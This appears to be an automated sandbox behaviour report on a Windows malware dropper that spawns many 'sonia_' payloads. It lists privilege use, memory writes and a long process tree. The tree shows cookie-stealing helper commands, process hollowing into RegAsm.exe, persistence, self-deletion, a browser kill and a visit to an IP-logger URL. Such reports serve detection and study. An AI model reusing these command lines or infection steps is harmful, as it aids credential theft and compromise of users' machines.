description pid Process Token: SeDebugPrivilege 744 sonia_4.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 984 svchost.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeDebugPrivilege 1124 rundll32.exe Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeShutdownPrivilege 3016 Process not Found Token: SeCreatePagefilePrivilege 3016 Process not Found Token: SeAssignPrimaryTokenPrivilege 2700 svchost.exe Token: SeIncreaseQuotaPrivilege 2700 svchost.exe Token: SeSecurityPrivilege 2700 svchost.exe Token: SeTakeOwnershipPrivilege 2700 svchost.exe Token: SeLoadDriverPrivilege 2700 svchost.exe Token: SeSystemtimePrivilege 2700 svchost.exe Token: SeBackupPrivilege 2700 svchost.exe Token: SeRestorePrivilege 2700 svchost.exe Token: SeShutdownPrivilege 2700 svchost.exe Token: SeSystemEnvironmentPrivilege 2700 svchost.exe Token: SeUndockPrivilege 2700 svchost.exe Token: SeManageVolumePrivilege 2700 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2700 svchost.exe Token: SeIncreaseQuotaPrivilege 2700 svchost.exe Token: SeSecurityPrivilege 2700 svchost.exe Token: SeTakeOwnershipPrivilege 2700 svchost.exe Token: SeLoadDriverPrivilege 2700 svchost.exe Token: SeSystemtimePrivilege 2700 svchost.exe Token: SeBackupPrivilege 2700 svchost.exe Token: SeRestorePrivilege 2700 svchost.exe Token: SeShutdownPrivilege 2700 svchost.exe Token: SeSystemEnvironmentPrivilege 2700 svchost.exe Token: SeUndockPrivilege 2700 svchost.exe Token: SeManageVolumePrivilege 2700 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2700 svchost.exe Token: SeIncreaseQuotaPrivilege 2700 svchost.exe Token: SeSecurityPrivilege 2700 svchost.exe Token: SeTakeOwnershipPrivilege 2700 svchost.exe Token: SeLoadDriverPrivilege 2700 svchost.exe Token: SeSystemtimePrivilege 2700 svchost.exe Token: SeBackupPrivilege 2700 svchost.exe Token: SeRestorePrivilege 2700 svchost.exe Token: SeShutdownPrivilege 2700 svchost.exe Token: SeSystemEnvironmentPrivilege 2700 svchost.exe Token: SeUndockPrivilege 2700 svchost.exe Token: SeManageVolumePrivilege 2700 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2700 svchost.exe Token: SeIncreaseQuotaPrivilege 2700 svchost.exe Token: SeSecurityPrivilege 2700 svchost.exe Token: SeTakeOwnershipPrivilege 2700 svchost.exe Token: SeLoadDriverPrivilege 2700 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3016 Process not Found 3016 Process not Found -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3016 Process not Found 2224 MicrosoftEdge.exe 2676 MicrosoftEdgeCP.exe 2676 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 748 wrote to memory of 3768 748 8 (24).exe 76 PID 748 wrote to memory of 3768 748 8 (24).exe 76 PID 748 wrote to memory of 3768 748 8 (24).exe 76 PID 3768 wrote to memory of 3672 3768 setup_installer.exe 77 PID 3768 wrote to memory of 3672 3768 setup_installer.exe 77 PID 3768 wrote to memory of 3672 3768 setup_installer.exe 77 PID 3672 wrote to memory of 4012 3672 setup_install.exe 94 PID 3672 wrote to memory of 4012 3672 setup_install.exe 94 PID 3672 wrote to memory of 4012 3672 setup_install.exe 94 PID 3672 wrote to memory of 2104 3672 setup_install.exe 80 PID 3672 wrote to memory of 2104 3672 setup_install.exe 80 PID 3672 wrote to memory of 2104 3672 setup_install.exe 80 PID 3672 wrote to memory of 492 3672 setup_install.exe 81 PID 3672 wrote to memory of 492 3672 setup_install.exe 81 PID 3672 wrote to memory of 492 3672 setup_install.exe 81 PID 3672 wrote to memory of 752 3672 setup_install.exe 82 PID 3672 wrote to memory of 752 3672 setup_install.exe 82 PID 3672 wrote to memory of 752 3672 setup_install.exe 82 PID 3672 wrote to memory of 1632 3672 setup_install.exe 91 PID 3672 wrote to memory of 1632 3672 setup_install.exe 91 PID 3672 wrote to memory of 1632 3672 setup_install.exe 91 PID 3672 wrote to memory of 2132 3672 setup_install.exe 83 PID 3672 wrote to memory of 2132 3672 setup_install.exe 83 PID 3672 wrote to memory of 2132 3672 setup_install.exe 83 PID 3672 wrote to memory of 1684 3672 setup_install.exe 95 PID 3672 wrote to memory of 1684 3672 setup_install.exe 95 PID 3672 wrote to memory of 1684 3672 setup_install.exe 95 PID 1632 wrote to memory of 1368 1632 cmd.exe 84 PID 1632 wrote to memory of 1368 1632 cmd.exe 84 PID 1632 wrote to memory of 1368 1632 cmd.exe 84 PID 4012 wrote to memory of 3860 4012 cmd.exe 85 PID 4012 wrote to memory of 3860 4012 cmd.exe 85 PID 4012 wrote to memory of 3860 4012 cmd.exe 85 PID 492 wrote to memory of 3936 492 cmd.exe 86 PID 492 wrote to memory of 3936 492 cmd.exe 86 PID 492 wrote to memory of 3936 492 cmd.exe 86 PID 2104 wrote to memory of 2780 2104 cmd.exe 89 PID 2104 wrote to memory of 2780 2104 cmd.exe 89 PID 2104 wrote to memory of 2780 2104 cmd.exe 89 PID 2132 wrote to memory of 3764 2132 cmd.exe 88 PID 2132 wrote to memory of 3764 2132 cmd.exe 88 PID 2132 wrote to memory of 3764 2132 cmd.exe 88 PID 752 wrote to memory of 744 752 cmd.exe 87 PID 752 wrote to memory of 744 752 cmd.exe 87 PID 3860 wrote to memory of 3960 3860 sonia_1.exe 92 PID 3860 wrote to memory of 3960 3860 sonia_1.exe 92 PID 3860 wrote to memory of 3960 3860 sonia_1.exe 92 PID 3764 wrote to memory of 1684 3764 sonia_6.exe 95 PID 3764 wrote to memory of 1684 3764 sonia_6.exe 95 PID 3764 wrote to memory of 1684 3764 sonia_6.exe 95 PID 3872 wrote to memory of 1124 3872 rUNdlL32.eXe 97 PID 3872 wrote to memory of 1124 3872 rUNdlL32.eXe 97 PID 3872 wrote to memory of 1124 3872 rUNdlL32.eXe 97 PID 744 wrote to memory of 2792 744 sonia_4.exe 125 PID 744 wrote to memory of 2792 744 sonia_4.exe 125 PID 744 wrote to memory of 2792 744 sonia_4.exe 125 PID 1124 wrote to memory of 984 1124 rundll32.exe 71 PID 1124 wrote to memory of 2740 1124 rundll32.exe 17 PID 984 wrote to memory of 1536 984 svchost.exe 100 PID 984 wrote to memory of 1536 984 svchost.exe 100 PID 984 wrote to memory of 1536 984 svchost.exe 100 PID 1124 wrote to memory of 992 1124 rundll32.exe 56 PID 1124 wrote to memory of 2436 1124 rundll32.exe 23 PID 1124 wrote to memory of 2408 1124 rundll32.exe 25
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2740
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2720
-
C:\Users\Admin\AppData\Local\Temp\8 (24).exe"C:\Users\Admin\AppData\Local\Temp\8 (24).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Users\Admin\AppData\Local\Temp\7zS8BE99204\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8BE99204\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_2.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\7zS8BE99204\sonia_2.exesonia_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_3.exe4⤵
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Users\Admin\AppData\Local\Temp\7zS8BE99204\sonia_3.exesonia_3.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3936 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 9326⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Windows directory
- Program crash
PID:4628
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_4.exe4⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\AppData\Local\Temp\7zS8BE99204\sonia_4.exesonia_4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2792
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:4388 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:5092
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:4236
-
-
-
C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4452 -
C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exeC:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe8⤵
- Executes dropped EXE
PID:5084
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup 326.exe"C:\Users\Admin\AppData\Local\Temp\setup 326.exe"7⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4532 -
C:\Windows\winnetdriv.exe"C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626821503 08⤵
- Executes dropped EXE
PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:4616 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 8088⤵
- Program crash
PID:2004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 8408⤵
- Program crash
PID:4980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 8608⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Program crash
PID:4740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 9048⤵
- Program crash
PID:8
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 10008⤵
- Program crash
PID:5260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 11288⤵
- Program crash
PID:5480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 11128⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5580
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"7⤵
- Executes dropped EXE
PID:4968 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4968 -s 9968⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:4360
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhangd.exe"C:\Users\Admin\AppData\Local\Temp\zhangd.exe"7⤵
- Executes dropped EXE
PID:4832 -
C:\Users\Admin\AppData\Local\Temp\zhangd.exe"C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a8⤵
- Executes dropped EXE
PID:2804
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Users\Admin\AppData\Local\Temp\7zS8BE99204\sonia_6.exesonia_6.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:1684
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:4848
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_7.exe4⤵PID:1684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4012
-
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2436
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1860
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1392
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1360
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1172
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1072
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:860 -
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:1784 -
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task3⤵PID:6620
-
-
-
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:304 -
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task3⤵PID:2804
-
-
-
C:\Users\Admin\AppData\Roaming\shsgsgbC:\Users\Admin\AppData\Roaming\shsgsgb2⤵PID:6232
-
-
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:6080 -
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task3⤵PID:6560
-
-
-
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:5620 -
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task3⤵PID:2780
-
-
-
C:\Users\Admin\AppData\Roaming\shsgsgbC:\Users\Admin\AppData\Roaming\shsgsgb2⤵PID:6832
-
-
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:6716 -
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task3⤵PID:5940
-
-
-
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:6332 -
C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exeC:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423\8374.exe --Task3⤵PID:6404
-
-
-
C:\Users\Admin\AppData\Roaming\shsgsgbC:\Users\Admin\AppData\Roaming\shsgsgb2⤵PID:6156
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:992
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:1536
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8BE99204\sonia_5.exesonia_5.exe1⤵
- Executes dropped EXE
- Checks computer location settings
PID:1368 -
C:\Users\Admin\Documents\mkWPGHM5ESymd929goGa08Ba.exe"C:\Users\Admin\Documents\mkWPGHM5ESymd929goGa08Ba.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4220 -
C:\Users\Admin\Documents\mkWPGHM5ESymd929goGa08Ba.exeC:\Users\Admin\Documents\mkWPGHM5ESymd929goGa08Ba.exe3⤵
- Executes dropped EXE
PID:3844
-
-
-
C:\Users\Admin\Documents\kqeXdAGpVcGgLywxk0BYvmVm.exe"C:\Users\Admin\Documents\kqeXdAGpVcGgLywxk0BYvmVm.exe"2⤵
- Executes dropped EXE
PID:4312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp3⤵PID:516
-
C:\Windows\SysWOW64\cmd.execmd4⤵PID:2368
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp5⤵PID:5104
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.comAcre.exe.com k5⤵
- Executes dropped EXE
PID:5408 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k6⤵
- Executes dropped EXE
PID:5804 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k7⤵
- Executes dropped EXE
PID:1316 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k8⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5308 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe9⤵PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe9⤵PID:3120
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 305⤵
- Runs ping.exe
PID:4784
-
-
-
-
-
C:\Users\Admin\Documents\mcXQQ_4vhghRXKoYPq8IHK8j.exe"C:\Users\Admin\Documents\mcXQQ_4vhghRXKoYPq8IHK8j.exe"2⤵
- Executes dropped EXE
PID:4028 -
C:\Users\Admin\Documents\mcXQQ_4vhghRXKoYPq8IHK8j.exe"C:\Users\Admin\Documents\mcXQQ_4vhghRXKoYPq8IHK8j.exe"3⤵
- Modifies data under HKEY_USERS
PID:6732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 7883⤵
- Program crash
PID:6752
-
-
-
C:\Users\Admin\Documents\bR4zx8dIQOSG_1iSecN3jGoa.exe"C:\Users\Admin\Documents\bR4zx8dIQOSG_1iSecN3jGoa.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4004 -
C:\Users\Admin\Documents\bR4zx8dIQOSG_1iSecN3jGoa.exeC:\Users\Admin\Documents\bR4zx8dIQOSG_1iSecN3jGoa.exe3⤵PID:5064
-
-
C:\Users\Admin\Documents\bR4zx8dIQOSG_1iSecN3jGoa.exeC:\Users\Admin\Documents\bR4zx8dIQOSG_1iSecN3jGoa.exe3⤵
- Executes dropped EXE
PID:3024
-
-
C:\Users\Admin\Documents\bR4zx8dIQOSG_1iSecN3jGoa.exeC:\Users\Admin\Documents\bR4zx8dIQOSG_1iSecN3jGoa.exe3⤵
- Executes dropped EXE
PID:2364
-
-
-
C:\Users\Admin\Documents\8tjwwIyonm6su2Zy3Fvr6IzA.exe"C:\Users\Admin\Documents\8tjwwIyonm6su2Zy3Fvr6IzA.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4808 -
C:\Users\Admin\Documents\8tjwwIyonm6su2Zy3Fvr6IzA.exeC:\Users\Admin\Documents\8tjwwIyonm6su2Zy3Fvr6IzA.exe3⤵
- Executes dropped EXE
PID:4564
-
-
-
C:\Users\Admin\Documents\vF_tRUFDrgq74_eZghnvLSlC.exe"C:\Users\Admin\Documents\vF_tRUFDrgq74_eZghnvLSlC.exe"2⤵
- Executes dropped EXE
PID:1784
-
-
C:\Users\Admin\Documents\eBJ20yyL2mz8qCfJRissL3jN.exe"C:\Users\Admin\Documents\eBJ20yyL2mz8qCfJRissL3jN.exe"2⤵PID:4740
-
C:\Users\Admin\Documents\eBJ20yyL2mz8qCfJRissL3jN.exe"C:\Users\Admin\Documents\eBJ20yyL2mz8qCfJRissL3jN.exe"3⤵
- Executes dropped EXE
PID:4984 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\eBJ20yyL2mz8qCfJRissL3jN.exe"4⤵PID:5792
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:6080
-
-
-
-
-
C:\Users\Admin\Documents\lpAfni_7QD4LldXItFftZMwH.exe"C:\Users\Admin\Documents\lpAfni_7QD4LldXItFftZMwH.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:476 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "3⤵PID:2196
-
C:\Windows\SysWOW64\explorer.exeexplorer https://iplogger.org/2LBCU64⤵PID:4196
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s adj.reg4⤵
- Runs .reg file with regedit
PID:4320
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s adj2.reg4⤵
- Runs .reg file with regedit
PID:5704
-
-
-
C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"3⤵
- Executes dropped EXE
PID:4736
-
-
-
C:\Users\Admin\Documents\UsXq9y7lp4UClEwrvv1VdVIo.exe"C:\Users\Admin\Documents\UsXq9y7lp4UClEwrvv1VdVIo.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3920
-
-
C:\Users\Admin\Documents\9Pa8PMMPkyf8SGBEH1uYdCbf.exe"C:\Users\Admin\Documents\9Pa8PMMPkyf8SGBEH1uYdCbf.exe"2⤵
- Executes dropped EXE
PID:2792 -
C:\Users\Admin\Documents\9Pa8PMMPkyf8SGBEH1uYdCbf.exe"C:\Users\Admin\Documents\9Pa8PMMPkyf8SGBEH1uYdCbf.exe" -a3⤵
- Executes dropped EXE
PID:4508
-
-
-
C:\Users\Admin\Documents\7LaZKmUgP8g73aYi9Gpt9XlK.exe"C:\Users\Admin\Documents\7LaZKmUgP8g73aYi9Gpt9XlK.exe"2⤵
- Executes dropped EXE
PID:4852 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Bagnava.xltm3⤵PID:4496
-
C:\Windows\SysWOW64\cmd.execmd4⤵PID:2764
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^IPAFDLOJiKVQTxFiLgMiLlaMrCAuVnAKdUxdXbtsjyJWSQEpztbDlGmbvNCwlINIlkmYZfphlcUGAvUjYsMQqXmJxXUpUru$" Sia.xltm5⤵PID:4940
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.comSensitive.exe.com p5⤵
- Executes dropped EXE
PID:5232 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p6⤵
- Executes dropped EXE
PID:5712 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p7⤵
- Executes dropped EXE
PID:5476 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p8⤵
- Executes dropped EXE
PID:5296 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Sensitive.exe.com p9⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5752 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\RegAsm.exe10⤵PID:4408
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 305⤵
- Runs ping.exe
PID:3488
-
-
-
-
-
C:\Users\Admin\Documents\uHTznje98_0UVXX4DZ_JIH6K.exe"C:\Users\Admin\Documents\uHTznje98_0UVXX4DZ_JIH6K.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4416
-
-
C:\Users\Admin\Documents\5zYw5SgG32PobG9d_DhAst0D.exe"C:\Users\Admin\Documents\5zYw5SgG32PobG9d_DhAst0D.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4932 -
C:\Users\Admin\AppData\Roaming\1234.exeC:\Users\Admin\AppData\Roaming\1234.exe 12343⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5144 -
C:\Users\Admin\AppData\Roaming\1234.exe"{path}"4⤵PID:6756
-
-
-
-
C:\Users\Admin\Documents\9Lc433knRgQyJPxTFybI08ZB.exe"C:\Users\Admin\Documents\9Lc433knRgQyJPxTFybI08ZB.exe"2⤵
- Executes dropped EXE
PID:2820 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:5428
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:5524
-
-
-
